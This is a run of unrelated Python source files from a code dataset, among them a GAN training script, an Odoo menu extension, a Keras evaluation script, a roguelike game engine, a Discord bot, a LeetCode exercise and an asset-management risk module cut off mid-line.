torchvision\r\nimport torchvision.transforms as transforms\r\nT = transforms\r\n\r\nfrom model import Generator, Discriminator\r\nimport os\r\nimport datetime\r\nfrom torch import autograd\r\n\r\nos.environ[\"CUDA_VISIBLE_DEVICES\"] = \"0\"\r\n\r\ndef calc_gradient_penalty(netD, real_data, fake_data):\r\n # print \"real_data: \", real_data.size(), fake_data.size()\r\n BATCH_SIZE = real_data.size(0)\r\n alpha = torch.rand(BATCH_SIZE, 1)\r\n alpha = alpha.expand(BATCH_SIZE, real_data.nelement()//BATCH_SIZE).contiguous().view(BATCH_SIZE, 3, 32, 32)\r\n alpha = alpha.cuda()\r\n\r\n interpolates = alpha * real_data + ((1 - alpha) * fake_data)\r\n\r\n\r\n interpolates = interpolates.cuda()\r\n interpolates = autograd.Variable(interpolates, requires_grad=True)\r\n\r\n disc_interpolates = netD(interpolates)\r\n\r\n gradients = autograd.grad(outputs=disc_interpolates, inputs=interpolates,\r\n grad_outputs=torch.ones(disc_interpolates.size()).cuda(),\r\n create_graph=True, retain_graph=True, only_inputs=True)[0]\r\n gradients = gradients.view(gradients.size(0), -1)\r\n\r\n gradient_penalty = ((gradients.norm(2, dim=1) - 1) ** 2).mean() * 10\r\n return gradient_penalty\r\n\r\ndef compute_grad2(d_out, x_in):\r\n batch_size = x_in.size(0)\r\n grad_dout = autograd.grad(\r\n outputs=d_out.sum(), inputs=x_in,\r\n create_graph=True, retain_graph=True, only_inputs=True\r\n )[0]\r\n grad_dout2 = grad_dout.pow(2)\r\n assert(grad_dout2.size() == x_in.size())\r\n reg = grad_dout2.view(batch_size, -1).sum(1)\r\n return reg\r\n\r\nif __name__ == \"__main__\":\r\n # random seed\r\n torch.manual_seed(0)\r\n transform = []\r\n transform.append(T.RandomHorizontalFlip())\r\n transform.append(T.CenterCrop(32))\r\n transform.append(T.Resize(32))\r\n transform.append(T.ToTensor())\r\n transform.append(T.Normalize(mean=(0.5, 0.5, 0.5), std=(0.5, 0.5, 0.5)))\r\n transforms.Lambda(lambda x: x + 1./128 * torch.rand(x.size()))\r\n transform = T.Compose(transform)\r\n\r\n\r\n dataset = torchvision.datasets.CIFAR10(root='./cifar10', transform=transform, download=True)\r\n data_loader = torch.utils.data.DataLoader(dataset=dataset,\r\n batch_size=64,\r\n shuffle=True,\r\n drop_last=True,\r\n num_workers=8)\r\n\r\n G = Generator().cuda()\r\n D = Discriminator().cuda()\r\n D.load_state_dict(torch.load('./checkpoint/25000_D.pth'))\r\n G.load_state_dict(torch.load('./checkpoint/25000_G.pth'))\r\n optimizer_G = torch.optim.RMSprop(G.parameters(), lr=1e-4, alpha=0.99, eps=1e-8)\r\n optimizer_D = torch.optim.RMSprop(D.parameters(), lr=1e-4, alpha=0.99, eps=1e-8)\r\n print(\"start...\")\r\n dataiter = iter(data_loader)\r\n for idx in range(2000000):\r\n time_start = datetime.datetime.now()\r\n try:\r\n data, label = next(dataiter)\r\n except:\r\n dataiter = iter(data_loader)\r\n data, label = next(dataiter)\r\n\r\n data = data.cuda()\r\n \r\n if idx % 5 == 0:\r\n z = torch.randn(64, 128).cuda()\r\n fake = G(z)\r\n d_fake4g = D(fake)\r\n optimizer_G.zero_grad()\r\n loss_g = torch.mean(d_fake4g)\r\n loss_g.backward()\r\n optimizer_G.step()\r\n\r\n z = torch.randn(64, 128).cuda()\r\n fake = G(z)\r\n d_fake4d = D(fake.detach())\r\n data.requires_grad_()\r\n d_real4d = D(data)\r\n optimizer_D.zero_grad()\r\n #gp = calc_gradient_penalty(D, data, fake)\r\n gp = 10 * compute_grad2(d_real4d, data).mean()\r\n loss_d = torch.mean(d_real4d.mean() - d_fake4d.mean()) + gp\r\n loss_d.backward()\r\n optimizer_D.step()\r\n\r\n\r\n #save model\r\n if (idx+1)%25000 == 0:\r\n #\r\n \r\n torch.save(G.state_dict(), \"./checkpoint/{}_G.pth\".format(idx+25001))\r\n torch.save(D.state_dict(), \"./checkpoint/{}_D.pth\".format(idx+25001))\r\n #\r\n\r\n if (idx+1)%5000 == 0:\r\n torchvision.utils.save_image(fake, './samples/f{}.png'.format(idx+25001), nrow=8 , normalize=True)\r\n time_end = datetime.datetime.now()\r\n print('[%d/%d] D(x): %.4f D(G(z)): %.4f/ %.4f'% (idx+1, 2000000, d_real4d.mean().item(),\\\r\n d_fake4d.mean().item(), d_fake4g.mean().item()))\r\n #print('alpha: ', model.alpha)\r\n print(\"remains {:.4f} minutes...\".format((time_end - time_start).total_seconds() / 60. * (500000 - idx)))\r\n","sub_path":"successful models/WGAN_GP-RES/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":4562,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"412802101","text":"# -*- coding: utf-'8' \"-*-\"\n__author__ = 'Michael Karrer'\nfrom openerp.osv import osv\nfrom openerp import api, tools\nfrom openerp.tools import SUPERUSER_ID\n\n\nclass ir_ui_menu(osv.osv):\n _inherit = 'ir.ui.menu'\n\n @api.cr_uid_context\n @tools.ormcache_context(accepted_keys=('lang',))\n def load_menus(self, cr, uid, context=None):\n xmlid_obj = self.pool['ir.model.data']\n\n def add_xmlid_to_menu_root(mr={}):\n id = mr.get('id', False)\n if id:\n rec_id = xmlid_obj.search(cr, SUPERUSER_ID, [('model', '=', 'ir.ui.menu'), ('res_id', '=', id)], context=context)\n if rec_id:\n rec = xmlid_obj.browse(cr, SUPERUSER_ID, rec_id, context=context)\n if rec and rec.complete_name:\n mr['xml_id'] = rec.complete_name\n children = mr.get('children', False)\n if children:\n for child in children:\n add_xmlid_to_menu_root(mr=child)\n\n menu_root = super(ir_ui_menu, self).load_menus(cr=cr, uid=uid, context=context)\n\n add_xmlid_to_menu_root(mr=menu_root)\n\n # THIS COMMENTS/NOTES CAN BE REMOVED AFTER TESTING :)\n # test2 = xmlid_obj.search(cr, uid, [('model', '=', 'ir.ui.menu'), ('res_id', '=', '717')], context=context)\n # test3 = xmlid_obj.browse(cr, uid, test2, context=context)\n # inverse_test = xmlid_obj.get_object_reference(cr, uid, 'fso_base', test3.name)\n # inverse_test2 = xmlid_obj.xmlid_to_object(cr, uid, test3.complete_name)\n\n return menu_root\n","sub_path":"addons-own/web_menu_xmlid/models/ir_ui_menu.py","file_name":"ir_ui_menu.py","file_ext":"py","file_size_in_byte":1583,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"459379314","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\nimport sys\nimport cv2\nfrom keras.applications.imagenet_utils import preprocess_input\nfrom keras.models import load_model, model_from_json\nimport numpy as np\nfrom utils import padimg\nimport argparse\nfrom dataset_test import get\nfrom keras.applications.imagenet_utils import preprocess_input\n\nparse=argparse.ArgumentParser()\nparse.add_argument('-m', '--modelpath', type=str)\nargs=parse.parse_args()\n\njson_file = open('./logs/model.json', 'r')\nloaded_model_json = json_file.read()\njson_file.close()\nmodel = model_from_json(loaded_model_json)\n#loaded weights\n\nmdl_pth = args.modelpath\nmodel.load_weights(mdl_pth)\n\nimgs, segmaps = get('train')\ndatanum = len(imgs)\nmae = 0\nmse = 0 \nfor img, segmap in zip(imgs, segmaps):\n h, w = img.shape[0:2]\n padded_img = padimg(img, 32)\n test_data = cv2.cvtColor(padded_img, cv2.COLOR_BGR2RGB)\n test_data = preprocess_input(np.array([test_data]).astype(np.float64))\n pred_heatmap = model.predict(test_data, batch_size=1)[0]\n pred_heatmap = pred_heatmap[:h, :w, :]\n k = 255/pred_heatmap.max()\n vis_heatmap = (pred_heatmap * k).astype('uint8')\n vis_heatmap = np.concatenate((vis_heatmap, vis_heatmap, vis_heatmap), axis=2)\n retimg = np.concatenate((img, vis_heatmap), axis=0)\n pred_num = pred_heatmap.sum() / 20\n num = segmap.sum() / 20\n print('pred_num / num: ', pred_num, '/', num)\n mae += np.abs(pred_num - num)\n mse += (pred_num - num)**2\nprint('mae: ', mae/datanum)\nprint('mse: ', np.sqrt(mse/datanum))\n","sub_path":"keras.resnet.pyramids4.addval.uniform/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":1529,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"321947114","text":"if __name__ == \"__main__\":\n\tfrom sys import path\n\tpath.append(\"../src\")\n\nimport domain\nimport fastsweeping\nimport solver\nimport basis\nimport optexp\nimport wavespeed\nimport mysave\nimport numpy as np\nimport matplotlib.pyplot as plt\n\ndef test():\n\n\t# create domain\n\ta1 = 0.0; b1 = 0.0;\n\ta2 = 20.0; b2 = 4.0;\n\tnx = 501\n\tgrid = domain.Rectangle(a1, a2, b1, b2, nx)\n\tX,Y = grid.X, grid.Y\n\n\tfeasible_sources = grid.boundary_edge(\"top\", skip=10, flattened=True)\n\tfeasible_receivers = grid.boundary_edge('top', skip=10, flattened=True)\n\n\tc_true = wavespeed.graded_inclusion\n\tc = c_true(grid.X, grid.Y)\n\tplt.imshow(c_true(grid.X, grid.Y).T, origin=\"lower\")\n\tplt.title(\"True wavespeed\")\n\tplt.colorbar()\n\tplt.show()\n\n\tproblem_params = solver.create_problem_params(grid, c_true, feasible_sources = feasible_sources, feasible_receivers = feasible_receivers, c=c, c_reg=False, zero_window = 0, ic_fine=False, u_infty = 1e3, v_infty = 1e3)\t\n\tP_t = solver.TravelTimeProblem(problem_params, debug=False)\n\n\toedproblem_params = optexp.create_oedproblem_params(P_t, epsilon = 1e-10, border_crop = [2,2],\n\t\tcgiter_per_update = 0, ns_per_update = 1, nr_per_source = 17, chunk_size = 500,\n\t\ttheta_switch_point = 250, mask = None, nm_max = 1000)\n\tP_oed = optexp.OEDProblem(oedproblem_params, debug = True)\n\tP_oed.oed_driver(debug = True)\n\nif __name__ == \"__main__\":\n\ttest()\n","sub_path":"tests/findfirstreceivertest.py","file_name":"findfirstreceivertest.py","file_ext":"py","file_size_in_byte":1348,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"124162920","text":"\"\"\"\n문자열 배열을 받아 애너그램 단위로 그룹핑하라.\nInput: strs = [\"eat\",\"tea\",\"tan\",\"ate\",\"nat\",\"bat\"]\nOutput: [[\"bat\"],[\"nat\",\"tan\"],[\"ate\",\"eat\",\"tea\"]]\n\"\"\"\n\n\nstrs = [\"eat\", \"tea\", \"tan\", \"ate\", \"nat\", \"bat\"]\n\nimport collections\nfrom typing import List\n\ndef groupAnagrams(strs: List[str]) -> List[List[str]]:\n anagrams = collections.defaultdict(list)\n\n for word in strs:\n # 정렬하여 딕셔너리에 추가\n # Delimiter.join(): 리스트를 구분자를 기준으로 string으로 반환. cf) split() : 리스트로 반환\n # ''.join(sorted(word))를 통해 정렬하여 애너그램끼리 같은 key로 그룹핑하고\n # list 형식의 value에 해당 word를 append하는 전략\n anagrams[''.join(sorted(word))].append(word)\n # dict.values()는 view객체에 해당하므로 정확성을 위해 list로 캐스팅 필요\n return list(anagrams.values())\n\nprint(groupAnagrams(strs))\n\nanagrams = collections.defaultdict(list)\n\n\n\n","sub_path":"Algorithm/python_algorithm_interview_exercise/06-5.group_anagrams.py","file_name":"06-5.group_anagrams.py","file_ext":"py","file_size_in_byte":999,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"612751430","text":"\"\"\"\n Engine реализует движок игры.\n Через него происходят все операции, связанные с логикой и механикой игры.\n\"\"\"\n\nimport json\nimport os\n\n# logic\nfrom engine.engine_initializer import EngineInitializer, EngineInfo, EngineLoadTypes\nfrom engine.keys_handler import KeysHandler\n# render\nfrom engine.render import Render\nfrom logic.inventory import *\nfrom logic.patterns.strategy import AggressiveStrategy\nfrom logic.player import Player\nfrom logic.states import State, StateHolder\n\ncolors = {'fov_dark_walls': tc.Color(0, 5, 90),\n 'fov_dark_background': tc.Color(45, 45, 140),\n 'main_wall': tc.Color(167, 103, 65),\n 'main_ground': tc.Color(0, 30, 30),\n 'kate_ground': tc.Color(200, 146, 7)}\n\n\ndef save_game(engine):\n data = engine.serialize()\n\n flag = 'x'\n if os.path.isfile('media/GAME_SAVE.json'):\n flag = 'w'\n\n with open('media/GAME_SAVE.json', flag, encoding='utf-8') as file:\n json.dump(data, file, indent=4)\n\n\nclass Engine:\n def __init__(self, screen_width=80, screen_height=40, fov_mode=False, debug=False, player_lvl=1,\n load_type=EngineLoadTypes.NORMAL, tester=None):\n # состояние игры\n self.IS_GAME = True\n self.load_type = load_type\n self.curr_state = StateHolder(State.PLAYER_TURN)\n self.prev_state = StateHolder(State.PLAYER_TURN)\n if load_type == EngineLoadTypes.LOAD:\n return\n # держатель всех характеристик\n self.info = EngineInfo(screen_width, screen_height, player_lvl, fov_mode, debug)\n # инициализация среды\n self.map = EngineInitializer.init_map(self, load_type)\n self.player = EngineInitializer.init_player(self, load_type)\n self.mobs = EngineInitializer.init_entities(self, load_type)\n self.fov = None\n if fov_mode:\n self.fov = EngineInitializer.init_fov(self)\n if load_type == EngineLoadTypes.TEST:\n self.tester = tester\n\n def get_entities(self):\n return [self.player] + self.mobs\n\n def serialize(self):\n data = {\n \"info\": self.info.serialize(),\n \"player\": self.player.serialize(),\n \"entities\": [m.serialize() for m in self.mobs],\n \"map\": self.map.serialize()\n }\n return data\n\n @staticmethod\n def stop_engine(engine):\n engine.IS_GAME = False\n engine.curr_state = State.PLAYER_DEAD\n return OperationLog([{'message': Message('ENGINE WAS STOPPED.', tc.yellow)}])\n\n def get_command(self):\n command = None\n if self.load_type == EngineLoadTypes.TEST:\n command = self.tester.get_command(self)\n elif self.load_type in [EngineLoadTypes.LOAD, EngineLoadTypes.NORMAL]:\n command = KeysHandler.user_input(self)\n return command\n\n def player_turn(self):\n command = self.get_command()\n operation_log = command.execute()\n\n # логгирование в консоль\n for item in operation_log.log:\n message = item.get('message')\n maybe_dead_entity = item.get('dead')\n picked_item = item.get('new_item')\n is_menu_key = item.get('show_menu')\n is_drop_meny_key = item.get('drop_menu')\n is_index = item.get('inv_index')\n is_drop = item.get('drop_item')\n\n if message:\n self.info.msg_log.add_message(message)\n\n if maybe_dead_entity:\n message = maybe_dead_entity.die()\n if isinstance(maybe_dead_entity, Player):\n self.curr_state.value = State.PLAYER_DEAD\n else:\n if isinstance(maybe_dead_entity.strategy, AggressiveStrategy):\n self.info.killed_on_lvl += 1\n self.info.msg_log.add_message(message)\n\n if picked_item:\n operation_log.log.extend(self.player.pick_item(picked_item).log)\n self.mobs.remove(picked_item)\n\n if is_menu_key:\n self.prev_state.value = self.curr_state.value\n self.curr_state.value = State.SHOWING_MENU\n\n if is_drop_meny_key:\n self.prev_state.value = self.curr_state.value\n self.curr_state.value = State.DROP_ITEM\n\n if is_index is not None and is_index >= 0 and \\\n self.prev_state.value != State.PLAYER_DEAD:\n if is_index >= len(self.player.inventory.items):\n operation_log.add_item({'message': Message('Wrong item index.', tc.yellow)})\n continue\n item = self.player.inventory.items[is_index]\n if self.curr_state.value == State.SHOWING_MENU:\n operation_log.log.extend(self.player.inventory.activate_item(item).log)\n elif self.curr_state.value == State.DROP_ITEM:\n operation_log.log.extend(\n self.player.inventory.drop_item(self.get_entities(), item).log)\n\n if is_drop:\n self.prev_state.value = self.curr_state.value\n self.curr_state.value = State.DROP_ITEM\n\n if self.info.killed_on_lvl >= 3:\n self.__init__(self.info.scr_wd,\n self.info.scr_ht,\n fov_mode=self.info.FOV_MODE,\n debug=self.info.DEBUG,\n player_lvl=self.info.player_lvl + 1)\n continue\n\n def mob_turn(self):\n if self.curr_state.value != State.MOB_TURN:\n return\n\n # обновление поведения сущности, если она бот\n for mob in self.mobs:\n operation_log = mob.act(self.player, self.fov, self.map, self.get_entities())\n\n for item in operation_log.log:\n message = item.get('message')\n if message:\n self.info.msg_log.add_message(message)\n\n maybe_dead_entity = item.get('dead')\n if maybe_dead_entity:\n message = maybe_dead_entity.die()\n if isinstance(maybe_dead_entity, Player):\n self.curr_state.value = State.PLAYER_DEAD\n self.info.msg_log.add_message(message)\n\n if self.curr_state.value != State.PLAYER_DEAD:\n self.curr_state.value = State.PLAYER_TURN\n\n def stop(self):\n self.IS_GAME = False\n\n def game_exit(self):\n # если игрок не мертв и мы вышли - сохраняем игру\n if self.curr_state.value != State.PLAYER_DEAD and self.load_type != EngineLoadTypes.TEST:\n save_game(self)\n elif self.load_type != EngineLoadTypes.TEST:\n # удаляем сохранение при смерти\n if os.path.isfile('media/GAME_SAVE.json'):\n os.remove('media/GAME_SAVE.json')\n\n def init_console_font(self):\n # подгрузка шрифта\n tc.console_set_custom_font(self.info.FONT_PATH, tc.FONT_TYPE_GREYSCALE | tc.FONT_LAYOUT_TCOD)\n\n def run(self):\n self.init_console_font()\n # инициализация главной консоли\n with tc.console_init_root(self.info.scr_wd,\n self.info.scr_ht,\n title=self.info.GAME_NAME, fullscreen=False) as root_console:\n while self.IS_GAME:\n # режим открытия карты\n if self.info.FOV_MODE:\n Render.recompute_fov(self, self.player.x, self.player.y, self.info.fov_radius)\n # отрисовка сущностей\n Render.render_all(root_console, self.info.BARS_CONS, self.player,\n self.map, self.get_entities(),\n self.info.scr_wd, self.info.scr_ht, colors,\n self.info.FOV_MODE, self.fov, self.info.msg_log, self.curr_state)\n # вывод консоли\n tc.console_flush()\n # удаление предыдущих позиций\n Render.clear_all(root_console, self.get_entities())\n # ход игрока\n self.player_turn()\n # ход мобов\n self.mob_turn()\n\n self.game_exit()\n","sub_path":"test_data/projects/roguelike/project/engine/engine.py","file_name":"engine.py","file_ext":"py","file_size_in_byte":8602,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"372344936","text":"import discord\n\n#TOKEN = \"\"\n#TEXTCHANNEL = \"\"\nclient = discord.Client()\n\ntext_chat = discord.Object(TEXTCHANNEL)\n\n@client.event\nasync def on_ready():\n msg = \"LOLbotがログインしたよ!\"\n await client.send_message(text_chat,msg)\n\n@client.event\nasync def on_member_update(before, after):\n if before.game != after.game and before.game == None:\n msg = after.display_name + \"が\" + str(after.game) + \"を開始したよ!\"\n await client.send_message(text_chat,msg)\n\n@client.event\nasync def on_voice_state_update(before, after):\n if before.voice_channel == None:\n msg = after.display_name + \"が\" + after.voice_channel.name + \"に参加したよ!\"\n await client.send_message(text_chat,msg)\n\nclient.run(TOKEN)\n","sub_path":"discordbot.py","file_name":"discordbot.py","file_ext":"py","file_size_in_byte":753,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"228393130","text":"import numpy as np\nimport random\nimport os\n\n\n\n\n\nclass hobbit_base:\n\n def __init__(self, matrix_file = \"matrix.csv\"):\n self.matrix_file = matrix_file\n self.matrix = None\n self.categories = None\n\n\n self._load()\n\n def _load(self):\n matrix_file_path = os.path.join(os.path.dirname(os.path.realpath(__file__)), self.matrix_file)\n # Determine number of columns\n with open(matrix_file_path) as f:\n n_cols = len(f.readline().split(','))\n self.categories = [row.split(',')[0] for row in f.readlines()]\n\n\n self.matrix = np.loadtxt(matrix_file_path, delimiter=',', skiprows=1, usecols=range(1, n_cols))\n\n def reward(self, cell):\n raise NotImplementedError(\"reward is not implemented!\")\n\n def punish(self, cell):\n raise NotImplementedError(\"punish is not implemented!\")\n\n def evaluate_taskset(self, taskset_ans):\n\n for task in taskset_ans:\n task_type = task[0]\n task_level = task[1]\n try:\n task_passed = task[2]\n except:\n task_passed = False\n\n cell = (self.categories.index(task_type), task_level)\n\n # If task was passed, punish task's position in matrix\n if task_passed:\n self.reward(cell)\n # If task was NOT passed, reward task's position in matrix\n else:\n self.punish(cell)\n\n self.taskset = None\n\n\n def get_skill(self):\n\n num_categories = len(self.matrix)\n count = 0\n skill = 0\n\n for y in range(len(self.matrix[0])):\n for x in range(len(self.matrix)):\n count += 1\n cell = self.matrix[x][y]\n cell_difficulty = (count / num_categories)\n skill += ((cell/100) * cell_difficulty)\n return skill\n\n\n # Determine cell of task based on ('while', 0)\n def cell_of(self, task):\n return self.categories.index(task[0]), task[1]\n\n\n def sum(self):\n return np.sum(self.matrix)\n\n def cleanup(self):\n count = 0\n num_categories = len(self.matrix)\n skill = self.get_skill()\n\n for y in range(len(self.matrix[0])):\n for x in range(len(self.matrix)):\n count += 1\n cell_difficulty = (count / num_categories)\n\n\n\n\n\n\n\n def closest_skill_cell(self):\n count = 0\n num_categories = len(self.matrix)\n\n skill_value = []\n skill_cell = []\n\n for y in range(len(self.matrix[0])):\n for x in range(len(self.matrix)):\n count += 1\n cell_difficulty = (count / num_categories)\n\n skill_value.append(cell_difficulty)\n skill_cell.append((x,y))\n\n\n idx = (np.abs(skill_value-self.get_skill())).argmin()\n\n return skill_cell[idx]\n\n def cleanup(self):\n count = 0\n num_categories = len(self.matrix)\n closest_cell = self.closest_skill_cell()\n skill = self.get_skill()\n for y in range(len(self.matrix[0])):\n for x in range(len(self.matrix)):\n count += 1\n cell_difficulty = (count / num_categories)\n\n if cell_difficulty + 0.5 < skill and self.matrix[x][y] > .0:\n #print(\"%s | %s => %s\" % (self.matrix[x][y], (x,y), closest_cell))\n self.matrix[closest_cell[0], closest_cell[1]] += self.matrix[x][y]\n self.matrix[x][y] = .0\n\n\n\n\n\n\n\n\n\n\n\n def avg(self):\n return np.mean(self.matrix)\n\n","sub_path":"Adaptive-Learning/Algorithms/Hobbit/hobbit.py","file_name":"hobbit.py","file_ext":"py","file_size_in_byte":3581,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"623492230","text":"# Definition for a binary tree node.\n# class TreeNode:\n# def __init__(self, x):\n# self.val = x\n# self.left = None\n# self.right = None\n\nclass Solution:\n def isValidBST(self, root: TreeNode) -> bool:\n if not root or not root.left and not root.right:\n return True\n else:\n self.isValid = True\n self.dfs(root)\n return self.isValid\n \n def dfs(self, root):\n if not root.left and not root.right:\n return (root.val, root.val)\n \n if root.left:\n l_max, l_min = self.dfs(root.left)\n if l_max >= root.val:\n self.isValid = False\n if root.right:\n r_max, r_min = self.dfs(root.right)\n if r_min <= root.val:\n self.isValid = False\n \n if root.left and root.right:\n return (max(l_max, r_max, root.val), min(l_min, r_min, root.val))\n elif root.left:\n return (max(l_max, root.val), min(l_min, root.val))\n else:\n return (max(r_max, root.val), min(r_min, root.val))\n","sub_path":"Python/98ValidateBinarySearchTree.py","file_name":"98ValidateBinarySearchTree.py","file_ext":"py","file_size_in_byte":1123,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"391160883","text":"# # # # # # # # # # # # # # # # # # # # # # # #\r\n# # \r\n# Module to run real time contingencies #\r\n# By: David Alvarez and Laura Cruz #\r\n# 09-08-2018 #\r\n# Version Aplha-0. 1 # \r\n# #\r\n# Module inputs: #\r\n# -> File name #\r\n# # # # # # # # # # # # # # # # # # # # # # # #\r\n\r\nimport pandas as pd\r\nimport random\r\nfrom scipy.interpolate import interp1d\r\nimport calendar\r\nimport numpy as np\r\nimport datetime\r\n\r\nfrom APM_Module_Tools import Fitt_constants_HI,Read_Table\r\nfrom APM_Module_Regulatory import APM_Regulatory # Import regulatory class\r\nfrom ACM_Module import ACM # Criticality module\r\n\r\n# Function to allocate asset list\r\ndef Read_Table_Conditions(DB_name,table,row,ID,source_type='Excel'):\r\n if source_type=='Excel':\r\n df = pd.read_excel(open(DB_name, 'rb'), sheet_name=table) # Sheet with loads tags\r\n df = df[df['Serial']==ID] \r\n columms = ['Test_ID', 'Date', row]\r\n df = df[columms]\r\n df = df.rename(columns = {row:'Val'})\r\n df = df.dropna()\r\n return df\r\n# Function to allocate asset data\r\ndef Read_Asset_Data(DB_name,table,ID,source_type='Excel'):\r\n if source_type=='Excel':\r\n df = pd.read_excel(open(DB_name, 'rb'), sheet_name=table) # Sheet with loads tags\r\n df = df[df['Serial']==ID] \r\n return df\r\n\r\ndef Load_Asset_Portfolio(file,table):\r\n df = pd.read_excel(open(file, 'rb'), sheet_name=table) # Sheet with loads tags\r\n df = df.set_index('ID')\r\n return df\r\n\r\nclass APM():\r\n def __init__(self,case_sett,load_growth):\r\n \r\n if 'path' in case_sett.keys():\r\n self.case_path = case_sett['path']\r\n else:\r\n self.case_path = '' \r\n # Asset porfolio source\r\n source = case_sett['portfolio_source']\r\n \r\n\r\n self.Asset_Portfolio_List = Load_Asset_Portfolio(source,'ASSETS')\r\n self.Asset_Location = Load_Asset_Portfolio(source,'LOCATIONS')\r\n asset = {} # create Dictionary of Assets\r\n\r\n #db_structure = case_sett['database_sett']\r\n for id,row in self.Asset_Portfolio_List.iterrows():\r\n #asset[id] = Asset_M(row,id,db_structure)\r\n asset[id] = Asset_M(row,id,case_sett,self.case_path)\r\n self.Asset_Portfolio = asset\r\n self.load_growth = load_growth\r\n\r\n def Compute_All_AM_Index(self,date):\r\n for id in self.Asset_Portfolio:\r\n self.Asset_Portfolio[id].AM_Index(date) \r\n\r\n def POF_Status(self):\r\n assets = self.Asset_Portfolio\r\n fail = {} \r\n \r\n for id in assets:\r\n fail_succes = random.random() \r\n asset = assets[id]\r\n pof = asset.pof_2\r\n if asset.fail==True:\r\n asset.time_fail +=1\r\n if asset.time_fail>asset.mttr: # Check if the asset was repaired\r\n asset.fail =False\r\n asset.time_fail =0\r\n elif fail_succes <= pof: # Dictinary with desconections \r\n asset.fail=True\r\n asset.time_fail =1\r\n \r\n \r\n fail[asset.name]=asset.fail\r\n return fail \r\n\r\n# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #\r\n def Risk_Index_During_Time(self,Cont,date_beg,n_hours,trail,df_pof=pd.DataFrame()):\r\n cr_obj = ACM(Cont.load_user,Cont.gen_data) # Criticality object, create\r\n \r\n date_beg = datetime.datetime.fromordinal(date_beg.toordinal())\r\n res = []\r\n for n in range(n_hours): \r\n date = date_beg+ datetime.timedelta(hours=n) \r\n l_date = date.date()\r\n h = n%24\r\n if h==0: \r\n if df_pof.empty: \r\n self.Compute_All_AM_Index(l_date) # Update performance index \r\n else: \r\n for l_id in self.Asset_Portfolio: # pof was compute previusly \r\n self.Asset_Portfolio[l_id].pof_2 = df_pof.loc[l_date][l_id]\r\n\r\n '''Asset_status = self.POF_Status() # POF matrix\r\n day_name = calendar.day_name[date.weekday()] \r\n h = n%24\r\n n_days = datetime.timedelta(hours=n).days\r\n growth_rate = Cont.f_growth_rate(n_days) # Growth rate at day n\r\n Cr,SAIDI = Cont.Run_Load_Flow(Cont.net,day_name,h,Asset_status,growth_rate=growth_rate)\r\n \r\n\r\n # Review review \r\n #if Cr >0:\r\n if True in Asset_status.values():\r\n Asset_status['Date'] = date\r\n Asset_status['Cr'] = Cr\r\n Asset_status['SAIDI'] = SAIDI\r\n Asset_status['Ite'] = trail\r\n res.append(Asset_status)'''\r\n\r\n Asset_status = self.POF_Status() # POF matrix\r\n\r\n if True in Asset_status.values():\r\n day_name = calendar.day_name[date.weekday()] \r\n n_days = datetime.timedelta(hours=n).days\r\n growth_rate = Cont.f_growth_rate(n_days) # Growth rate at day n\r\n ENS,SAIDI,ENG,BEN = Cont.Run_Load_Flow(Cont.net,day_name,h,Asset_status,cr_obj,growth_rate=growth_rate) \r\n # Update data \r\n Asset_status['Date'] = date\r\n #Asset_status['ES'] =\r\n Asset_status['ENS'] = ENS\r\n #Asset_status['gen'] = PUR_EN \r\n Asset_status['Cr'] = -BEN\r\n Asset_status['SAIDI'] = SAIDI\r\n Asset_status['Ite'] = trail\r\n res.append(Asset_status)\r\n\r\n return res\r\n\r\n# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # \r\n# Eval HI without data # \r\n# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #\r\ndef HI_Replace():\r\n x = np.array([0,20,25,45])\r\n y = np.array([0,0.1,0.35,0.99])\r\n fit_f = Fitt_constants_HI(x,y)\r\n return fit_f\r\n\r\n# # # # # # # # # # # # # # # # # # # # # # # # # # # # #\r\n# #\r\n# Asset Class # \r\n# # \r\n# # # # # # # # # # # # # # # # # # # # # # # # # # # # #\r\n\r\nclass Asset_M():\r\n def __init__(self,data,id,db,path):\r\n # id -> Asset id\r\n # db -> dbase structure name\r\n self.case_path = path\r\n \r\n self.db = db\r\n db_struc = db['database_sett']#db\r\n \r\n #self.decision = None # List of decisions \r\n self.decision =pd.DataFrame() \r\n\r\n self.id = id\r\n self.name = data.Name\r\n self.type = data.Type\r\n self.mttr = data.MTTR\r\n self.inc = data.Incomes\r\n self.capex = data.CAPEX\r\n self.opex = data.OPEX\r\n self.fail = False\r\n self.time_fail = 0 # Asset time failed\r\n #self.oper_date = datetime.date(1980, 1, 1)\r\n\r\n self.hi_rem = HI_Replace() # Function to estimate the HI of a new asset \r\n\r\n #DB_Model = self.Load_DB_Model(db)\r\n DB_Model = self.Load_DB_Model(db_struc)\r\n HI_Weigths = self.Weights()\r\n HI_Con_Limits = self.Load_Cond_Limits()\r\n\r\n # Load constant data \r\n #->data = Read_Table(db['database_Cons_Set'])\r\n #'Cons'\r\n #->data = Read_Table(data['Cons']['DB_Name'])\r\n #->l_AL = data[self.type] # Average life in years\r\n \r\n\r\n # Load condition \r\n self.cond = self.Load_Condition(DB_Model,HI_Weigths,HI_Con_Limits) \r\n\r\n # Lambda function \r\n self.lambda_f = self.Load_Lambda_Constants()\r\n\r\n # Load asset data \r\n self.data = self.Load_Asset_Data(DB_Model)\r\n\r\n self.reset_init()\r\n # Regulatory conditions\r\n self.apm_reg = APM_Regulatory(self.db,self.data)\r\n\r\n def reset_init(self):\r\n # # # # # # # # # # # # # # #\r\n self.r = None\r\n self.pof = None \r\n self.pof_2 = None\r\n self.r = None \r\n self.lambda_k = None \r\n self.elap_life 